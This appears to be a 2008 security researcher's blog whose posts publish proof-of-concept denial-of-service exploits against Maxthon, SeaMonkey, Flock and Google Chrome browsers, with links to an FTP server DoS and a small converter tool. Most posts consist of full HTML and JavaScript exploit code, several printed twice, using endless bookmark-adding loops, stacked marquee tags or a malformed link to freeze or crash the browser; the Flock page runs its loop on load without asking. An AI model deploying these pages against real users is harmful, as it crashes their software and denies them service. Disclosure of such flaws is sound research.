17 September, 2008
Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC
http://www.zeroscience.org/codes/femitter-dos.c
http://www.securityfocus.com/bid/31226
http://www.milw0rm.com/exploits/6481
http://www.packetstormsecurity.org/filedesc/fermitter-dos.txt.html
Cheers ;)
15 September, 2008
CoolCon v0.2 Released
Released my Cool Converter :P "CoolCon v0.2" written in C language, 862 lines of code with a nice interface and new features added.
Conversion from Text to: Binary, Decimal, Octal, Hexadecimal, ASCII, ROT13(vice versa)
Conversion from Decimal to: Binary, Octal, Hexadecimal
Conversion from Binary to: Decimal, Octal, Hexadecimal
Conversion from Text to URL Unicode UTF-8 (new).
Included: ASCII table and Base64 table output
I know i said that the new version will have base64 conversion and vigenere cipher but..no time so enjoy and till next release ;)
CoolCon v0.2 Download link: http://www.packetstormsecurity.org/Win/CoolCon0.2.rar
t00t :D
09 September, 2008
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
<!--
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.
Product web page: http://www.maxthon.com
by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
09.09.2008
-->
<html>
<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</title>
<head>
<body>
<script type="text/javascript">
alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");
function thricer()
{
title="Attack";
url="http://www.thrice.net/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
for (x=0; x<x+1; x++)
thricer();
}
else
{
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script>
</body>
</head>
</html>
http://www.packetstormsecurity.org/filedesc/maxthon-dos.txt.html
http://www.milw0rm.com/exploits/6434
http://www.securityfocus.com/bid/31098
http://www.zeroscience.org/codes/maxthon_dos.txt
Test: CLICK (warned)
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.
Product web page: http://www.maxthon.com
by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
09.09.2008
-->
<html>
<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</title>
<head>
<body>
<script type="text/javascript">
alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");
function thricer()
{
title="Attack";
url="http://www.thrice.net/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
for (x=0; x<x+1; x++)
thricer();
}
else
{
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script>
</body>
</head>
</html>
http://www.packetstormsecurity.org/filedesc/maxthon-dos.txt.html
http://www.milw0rm.com/exploits/6434
http://www.securityfocus.com/bid/31098
http://www.zeroscience.org/codes/maxthon_dos.txt
Test: CLICK (warned)
07 September, 2008
SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
<!--
Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.
Product web page: http://www.seamonkey-project.org/
Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
08.09.2008
-->
<html>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
<head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");
function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}
alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (b0x == true)
{
t00t();
}
else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script> </center> </body> </head> </html>
http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070
Test: http://www.zeroscience.org/codes/seamonkey_dos.html
Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.
Product web page: http://www.seamonkey-project.org/
Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
08.09.2008
-->
<html>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
<head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");
function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}
alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (b0x == true)
{
t00t();
}
else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script> </center> </body> </head> </html>
http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070
Test: http://www.zeroscience.org/codes/seamonkey_dos.html
06 September, 2008
Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit
http://www.milw0rm.com/exploits/6391
http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html
http://www.securityfocus.com/bid/31044/
Test: http://www.zeroscience.org/codes/flock_dos.html
PoC follows:
-------------------------------------------------
<!----------------------------------------------0
||
| Flock Web Browser 1.2.5 Remote DoS Exploit|
| |
| by Gjoko 'LiquidWorm' Krstic|
| |
| http://www.zeroscience.org|
| |
| liquidworm [t00t] gmail.com|
| |
| 06.09.2008|
| |
0----------------------------------------------->
<html>
<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</Title>
<head>
<br /><br />
<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>
<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd><h2></center>
<body>
<script type="text/javaScript">
function Xploit()
{
title="DoS";
url="http://www.destr0y.net";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
for (n=0; n<n+1; n++)
Xploit();
</script>
<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>
</body> </head> </html>
<!-- thanks to Gianni Amato -->
------------------------------------------
05 September, 2008
Google Chrome Browser 0.2.149.27 Denial of Service Exploit
Test: http://zeroscience.org/codes/goodos.html
http://packetstormsecurity.org/filedesc/google-chrome-dos2.txt.html
<!-----------------------------------------------
| |
| Vulnerability discovered by Rishi Narang |
| |
| Exploit by LiquidWorm, September 2008 |
| |
| http://www.zeroscience.org |
| |
| liquidworm [t00t] gmail.com |
| |
------------------------------------------------>
<html>
<title>Google Chrome DoS Exploit</title>
<head>
<br />
<br />
<script type="text/javascript">
alert("Google Chrome Browser 0.2.149.27 Denial of Service Exploit");
var box = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (box == true)
{
document.write("Just point to the hyperlink... <a href=\"jox:%\"><strong>HERE</strong></a>");
}
else { alert("Ok Dude!"); window.location.href = "http://www.zeroscience.org"; }
</script>
</head>
</html>
Subscribe to:
Posts (Atom)